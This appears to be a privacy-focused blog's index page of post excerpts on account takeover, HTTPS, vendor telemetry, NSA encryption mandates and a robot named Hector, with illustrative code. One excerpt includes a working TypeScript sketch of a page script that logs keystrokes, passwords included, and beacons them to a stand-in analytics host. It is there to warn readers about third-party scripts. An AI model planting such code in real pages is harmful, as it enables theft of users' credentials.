Facebook is just the distraction from the real threat

The “Facebook problem” is real and it’s bad.  Whatever else you get from this, I’m not trying to play down the impact and continuing risk of data custodians who betray our trust.

It’s just that in the greater scheme of things, account takeover is much more dangerous, much easier to implement, verified to be ubiquitous on the web today, and yet is almost completely unreported.  We should address both this and the Facebook problem, but if we can do only one, it should be this one.  This post explains why, and how I’ve tried to address it over time.

[Read more…]

All Your Accounts Are Belong To Us

Would you give your account ID, password, account numbers, email address, home address, and all your other sensitive personal information to random strangers? No? Are you sure? Scripts embedded in a web page or app allow the script provider to record every keystroke and every mouse movement you make on the page.

So why are so many of the scripts on account management pages hosted by 3rd parties?
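To make the risk concrete, here is a minimal sketch, in TypeScript, of what any third-party script can do once it runs in the page. The collection endpoint is hypothetical, but the browser APIs are the ordinary ones available to every script on the page:

```typescript
// Minimal sketch: a script included in a page runs with full access to that
// page, so it can observe every keystroke and mouse movement and ship them off.
// The endpoint URL is hypothetical.

type Captured = { t: number; kind: "key" | "mouse"; detail: string };

const buffer: Captured[] = [];

// Record every keystroke typed anywhere on the page, passwords included.
document.addEventListener("keydown", (e: KeyboardEvent) => {
  buffer.push({ t: Date.now(), kind: "key", detail: e.key });
});

// Record mouse movement, which reveals which fields and links you hover over.
document.addEventListener("mousemove", (e: MouseEvent) => {
  buffer.push({ t: Date.now(), kind: "mouse", detail: `${e.clientX},${e.clientY}` });
});

// Periodically send everything captured so far back to the script's host.
setInterval(() => {
  if (buffer.length === 0) return;
  navigator.sendBeacon(
    "https://cdn.example-analytics.com/collect",
    JSON.stringify(buffer.splice(0, buffer.length))
  );
}, 5000);
```

Nothing in the browser distinguishes a script you wrote from a script your analytics or advertising partner hosts; once it is on the page, it sees what the page sees.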

[Read more…]

In defense of HTTPS Everywhere

Today Doc Searls reposted Dave Winer’s three-part post challenging the need for HTTPS Everywhere.  Dave writes:

There’s no doubt it will serve to crush the independent web, to the extent that it still exists. It will only serve to drive bloggers into the silos.

Those are some pretty strong claims from Dave, and his posts are worth a read.  They come, in my opinion, to an entirely wrong conclusion despite some valid points and a “sky is falling” delivery.  Why wrong?  Consider how you might prioritize security in a software development project.  This is something I tell my consulting clients, but I’m going to give it to you for free:

[Read more…]

Enable-Javascript.com

Today, for the first time, a web site I visited directed me to http://www.enable-javascript.com/.  The site is supposed to be a service for webmasters who need an easy and accurate way to tell site visitors how to enable Javascript in the browser.  Though at first glance that may seem like a great idea and a useful service, it is just the opposite.

This is bad on so many levels.

[Read more…]

Vendor entitlement run amok

My main issue with vendors turning us into instrumented data sources isn’t the data so much as the lack of consent. My Fitbit knows a lot about me, but it’s an add-on that I self-selected and it provides value to me. The tracking in my browser is not something I can easily avoid, since the browser is now an integral part of my life. Between those extremes are lots of IoT devices for which you can currently choose a private version, but that choice is rapidly disappearing. You can still buy a dumb light switch but not a dumb car, for example. Your shiny new GT phones home.

Among the vendors who seem to feel an entitlement to our data is Microsoft, whose Windows 10 is basically a box of spyware disguised as a user-productivity-gaming-and-cat-video-watching platform. I’ve already written about the issues there, how to mitigate them, and the disheartening number of those “features” that can’t be disabled. Yet as bad as all that is, this latest revelation still managed to surprise me across several metrics: the lack of consent, the extent of the invasion, the degree of exposure, the fact that it’s already been exploited to infect user devices, the fact that the entity who exploited it is a “legitimate” vendor, and the fact that said “legitimate” vendor egregiously exposed the exploit to the Internet. [Read more…]

Apple applies for patent to deliver ads based on credit status

In USPTO Application 20150199725, Apple describes a system for targeting advertisements “based on the amount of pre-paid credit available to each user.”  The application goes on to say that “An advantage of such targeted advertising is that only advertisements for goods and services which particular users can afford, are delivered to these users.”

I’m unhappy with this for a few reasons.  My first objection is that the human-readable description on the application is deceptive.  Your pre-paid balance is not an indicator of what you “can afford.” For example, if you deposit $X each week for your college kid’s expenses, that balance on the card doesn’t mean (s)he can “afford” luxury products costing $X or less. If you are me, it means they can afford ramen noodles, paper, pens and not much else.

[Read more…]

The nightmare of easy and simple

The instrumented waste bin I predicted at the San Francisco Personal Data meetup a couple of years back is now a thing.  While researching GeniCan I naturally had to go read their privacy policy.  It was there that I stumbled onto a service that lets you generate a privacy policy from a workflow.  You fill in some data, select from several options, and it generates a custom policy from an inventory of templates that it fills in and assembles.  It can make policies for your web site, Facebook app or mobile app. Easy. Simple. Free.
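For a sense of what “fills in and assembles” means under the hood, here is a hedged sketch of that kind of template-driven generator. The clause text, option names, and company are all hypothetical, not the actual service’s templates:

```typescript
// Hypothetical sketch of a template-driven privacy policy generator:
// select clauses from an inventory based on the answers given, fill in
// the blanks, and concatenate the result into a "custom" policy.

interface PolicyOptions {
  companyName: string;
  collectsEmail: boolean;
  usesAnalytics: boolean;
  sharesWithPartners: boolean;
}

// The clause inventory: each entry knows when it applies and how to render itself.
const clauses = [
  { when: (_: PolicyOptions) => true,
    text: (o: PolicyOptions) => `${o.companyName} respects your privacy.` },
  { when: (o: PolicyOptions) => o.collectsEmail,
    text: (_: PolicyOptions) => "We collect your email address to provide our service." },
  { when: (o: PolicyOptions) => o.usesAnalytics,
    text: (_: PolicyOptions) => "We use third-party analytics to understand how our site is used." },
  { when: (o: PolicyOptions) => o.sharesWithPartners,
    text: (_: PolicyOptions) => "We may share your data with trusted partners." },
];

function generatePolicy(options: PolicyOptions): string {
  return clauses
    .filter(c => c.when(options))
    .map(c => c.text(options))
    .join("\n\n");
}

// A few checkboxes in, a boilerplate policy out.
console.log(generatePolicy({
  companyName: "Example Gadget Co.",
  collectsEmail: true,
  usesAnalytics: true,
  sharesWithPartners: false,
}));
```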

Sounds awesome, right?

You were waiting for the “but”?

[Read more…]

Better surveys = better signal

I’ve spilled many bits in this blog about the difference between vendor-driven creepy malvertising ad-tech and consumer-driven intentcasting and Vendor Relationship Management.  The vendor-driven model is the one where you are surveilled from all sides and the data compiled, analyzed, sliced, diced, massaged, correlated and enhanced until the vendor has a good idea of which things you will respond to viscerally, and then attempts to manipulate you with them.  This model is based on exploitation of human biases and vigilance fatigue.  Vendor Relationship Management (VRM), on the other hand, is about the consumer broadcasting intent and preferences to a market that can respond accordingly.  This model is based on fulfillment of the consumer’s self-directed interests and desires.

Somewhere in the middle are consumer surveys: direct customer input, wholly vendor driven.  Or at least many people, vendors and customers alike, think these are somewhere in the middle.  Me?  I’m a sucker for surveys since they are about as close to VRM as it gets most of the time these days.  I fill them out in bulk in hopes of detecting some whiff of VRM in one of them, and now and then I’m rewarded for my effort.  But only once in a blue moon.  Sadly, virtually all surveys I’ve seen fail to rise to a level that might qualify as anything close to VRM and most are just plain clueless.

[Read more…]

Forget back doors, the NSA wants to mandate a front door

In their never-ending quest to eavesdrop on you, the NSA now wants to mandate that all encrypted communications must allow them access.  As Joel Hruska explains in an article in Extreme Tech, there are many reasons why this will not work.  The two big ones are that it isn’t possible to guarantee that only authorized government agents will use the access, and that we currently have no effective means of oversight and accountability.

Dean Landsman recently posed the question “how does one go about preventing/protecting or just enabling security against such intrusion?”  The only answer is to do so in the legislature and in the various international bodies.  If the NSA proposal and others of its ilk become law, products like Blackphone and Qredo will become illegal.  However, this will not stop criminals from using crypto that the government cannot break and which is readily available.  It is true in the most literal sense that when unbreakable crypto is outlawed, only outlaws will have unbreakable crypto.

Considering the triviality of obtaining unbreakable crypto, only law-abiding citizens will use the NSA-accessible stuff.  Combine that with the power imbalance inherent in such a scheme and the inevitable conclusion is this:

Of all possible uses to which such a law can be put, the only ones we can predict with 100% confidence to be implemented are those that abuse the privacy of law-abiding citizens.

The corollary to this is that the higher the value of a criminal target, the more likely they are to use readily available unbreakable crypto.  That means the people the government most wants to catch are those least likely to be vulnerable to eavesdropping if the proposed legislation is enacted.  Such a law would be unfit for its stated purpose.  It would be broken at birth, defective by design.

There are a few possible technological controls that can be imposed.  For example, when using blinded tokens it is possible to design them in such a way that they can be un-blinded, but doing so is detectable.  It is doubtful any government would agree to using that technology though, since their investigation would be revealed immediately upon the unblinding of the token.
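The detectable un-blinding property itself requires a more elaborate construction than I can show here, but a toy Chaum-style RSA blinding sketch at least makes the terms “blind” and “un-blind” concrete. Everything below uses textbook-sized numbers and is illustrative only, not the accountable-token scheme described above:

```typescript
// Toy Chaum-style RSA blinding to illustrate what "blind" and "un-blind" mean.
// Illustrative only: tiny key, no padding, not a complete token scheme.

function modPow(base: bigint, exp: bigint, mod: bigint): bigint {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

// Modular inverse via the extended Euclidean algorithm.
function modInv(a: bigint, m: bigint): bigint {
  let [old_r, r] = [a % m, m];
  let [old_s, s] = [1n, 0n];
  while (r !== 0n) {
    const q = old_r / r;
    [old_r, r] = [r, old_r - q * r];
    [old_s, s] = [s, old_s - q * s];
  }
  return ((old_s % m) + m) % m;
}

// Toy RSA key: n = p*q, public exponent e, private exponent d.
const p = 61n, q = 53n, n = p * q;   // n = 3233
const e = 17n, d = 2753n;            // e * d ≡ 1 (mod 3120)

const message = 42n;                 // the token we want signed
const r = 7n;                        // blinding factor, coprime to n

// 1. The user blinds the message before sending it to the signer.
const blinded = (message * modPow(r, e, n)) % n;

// 2. The signer signs the blinded value without ever seeing the message.
const blindSignature = modPow(blinded, d, n);

// 3. The user un-blinds to obtain an ordinary signature on the original message.
const signature = (blindSignature * modInv(r, n)) % n;

// 4. Anyone can verify: signature^e mod n equals the original message.
console.log(modPow(signature, e, n) === message); // true
```

The accountability idea in the paragraph above amounts to adding a tamper-evident audit trail to step 3, so that anyone performing the un-blinding leaves evidence behind.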

However, even if enforceable accountability were implemented as a compromise, the government’s strategy could be to simply unblind everything.  Sort of a mass Denial-of-Privacy attack.  Or perhaps a Denial-of-Privacy-Enhancement (DOPE) attack if you want the acronym to accurately describe the people who would do such a thing.

This also illustrates one of the primary weapons brought to bear against personal liberty around the world: fatigue.  All that is necessary to pass such laws is to keep submitting them to the legislature.  The people impacted will object the first time.  Fewer of them the second time.  When it comes down to just the die-hard activists, the legislature can be confident they are one bill away from victory.

Thomas Jefferson once said “The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants.”  That was before digital communications were invented.  Can we perhaps try to refresh the tree of liberty with a call or FAX to our representative before we go off and start killing people?

Intentcasting…to a roach?

OK, so it’s a robot and not a roach. But it is a robot that *looks* a lot like a roach. Researchers at Bielefeld University are experimenting with emergent behavior on a robot platform they named Hector. Their software thus far has been reactive. The new software aims to give the robot “what if” capabilities to solve problems it has not been programmed for. This would imbue the robot with independent goal-directed behavior – i.e. robot intentions.

But beyond that, “they have now developed a software architecture that could enable Hector to see himself as others see him.” In other words, they gave it a theory of mind, and their ultimate goal is for it to be able to sense the intentions of humans and take these into account when formulating responses and actions. They want it to be self-aware. Though the rest of the world will probably see in this the parallels to Skynet of Terminator fame, the more interesting part to me is the notion that it will sense human intention.

Perhaps this is because the current crop of “smart” devices seems very autistic to me.  Though they have a wide range of apparent intelligence, they respond only to what they can directly sense, and only within a context of which they are the center.  The inability to make inferences about humans, and in particular to understand their intentions, is a typically autistic cognitive deficit.  While it is possible to emulate this to some extent, it is often perceived as inauthentic and creepy, which may be why I write about it so much.

Bielefeld University’s robot Hector is close to being self-aware

The quest by the marketing industry to provide targeted messaging tailored to your specific interests and intentions very much parallels the autistic experience.  Any given product or brand seeks to better understand how it is perceived by humans.  Or to put it another way, products and brands lack theory of mind and the ability to infer human emotions and intentions from non-verbal communication.  Like any autistic person, they attempt to mitigate their cognitive deficits by gathering data, observing reactions, forming a model of human behavior, calculating appropriate responses, then improving data sources and refining the model over time.  When humans do this we call it vocational training and independence skills.  When vendors do this we call it ad-tech.  Both groups tend to wonder why people at large often perceive it as creepy.

Hector is essentially autistic.  With the addition of self-awareness and the ability to infer human intentions, Hector may cross the line to creepy.  We’ll find out shortly.

JT (Jibo Terrestrial) phone home!

The consciousness of most of our iconic sci-fi robots like C3PO and Robbie was modeled after that of humans – it was self-contained and part of the robot itself. Even though the Star Wars bots could access the networked world, they didn’t send their sensor data back to a central mother ship to be interpreted, processed, and turned into instructions for the robot to follow, then transmitted back. Everything happened locally. Contrast this with our real-world robots that use the mother ship architecture. Siri, Cortana, Alexa, Google [x], Jibo, Pepper, etc. all phone home more often than ET.  If you use these products, their vendors have access to all the data they send back to the mother ship.  Because that data is potentially very valuable, it would be naive to believe that it will be discarded once its benefit to you, the user, has been realized.
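The architectural difference is easy to show. Here is a hedged sketch, with hypothetical types and a hypothetical vendor endpoint, of the two designs: a local interpreter that never lets sensor data leave the device, and a “mother ship” interpreter that sends everything to the vendor and waits for instructions:

```typescript
// Two ways to turn sensor data into robot actions. The interface is the same;
// what differs is where the data goes. All names and endpoints are hypothetical.

interface SensorFrame { audio: Float32Array; timestamp: number; }
interface Action { command: string; }

interface Interpreter {
  interpret(frame: SensorFrame): Promise<Action>;
}

// Sci-fi style: everything happens on the robot. The data never leaves.
class LocalInterpreter implements Interpreter {
  async interpret(frame: SensorFrame): Promise<Action> {
    // A stand-in for on-device inference; no network access needed.
    const loudEnough = frame.audio.some(sample => Math.abs(sample) > 0.5);
    return { command: loudEnough ? "turn-toward-sound" : "idle" };
  }
}

// Real-world style: the frame goes to the vendor's "mother ship", which
// interprets it, keeps whatever it likes, and returns instructions.
class MotherShipInterpreter implements Interpreter {
  constructor(private endpoint: string) {}
  async interpret(frame: SensorFrame): Promise<Action> {
    const response = await fetch(this.endpoint, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ audio: Array.from(frame.audio), timestamp: frame.timestamp }),
    });
    return (await response.json()) as Action;
  }
}

const interpreter: Interpreter = new LocalInterpreter();
// const interpreter: Interpreter = new MotherShipInterpreter("https://api.vendor.example/interpret");
```

The robot’s control loop can’t tell the two apart; the only difference is whether the sensor data stays on the device or ends up on the vendor’s servers, which is exactly the difference between the sci-fi robots and the shipping ones.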

It remains to be seen how the software coming out of Bielefeld will work, but one hopes that some aspect of self-awareness will be so incompatible with latency as to strongly favor local processing. If that is true and the new robot architecture is more like science fiction of yesteryear than the science fact of today, there is some hope that someone, somewhere on the planet will finally use intention detection in a non-creepy way that primarily benefits the individual and not the vendor.  It might also give us insights that will improve the lives of autistic people by helping us learn to infer human behavior in non-creepy ways.

On the other hand, if you ever read about Hector in Ad Age, we are all doomed. Skynet will have awoken. And it will have a really good deal for you.


A version of this post which more deeply explores the autism connection is posted on my Ask-An-Aspie blog here.